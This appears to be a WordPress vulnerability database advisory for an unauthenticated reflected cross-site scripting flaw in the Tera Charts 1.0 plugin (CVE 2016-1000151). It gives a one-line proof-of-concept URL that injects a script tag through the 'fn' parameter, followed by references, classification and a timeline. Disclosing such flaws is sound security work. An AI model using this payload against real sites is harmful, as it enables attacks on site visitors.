Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/tera-charts/charts/treemap.php?fn=";</script><script>alert(1);</script><script>"&userid=1

Affects Plugin

no known fix
- plugin closed

References

CVE 2016-1000151
URL http://www.vapidlabs.com/wp/wp_advisory.php?v=455
URL https://www.openwall.com/lists/oss-security/2016/05/11/12

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Larry W. Cashdollar, @_larry0
Submitter firefart
Submitter Website https://firefart.at/
Submitter Twitter _FireFart_
Views 6475
Verified No
WPVDB ID 8495

Timeline

Publicly Published 2016-05-11 (about 4 years ago)
Added 2016-05-11 (about 4 years ago)
Last Updated 2020-02-20 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin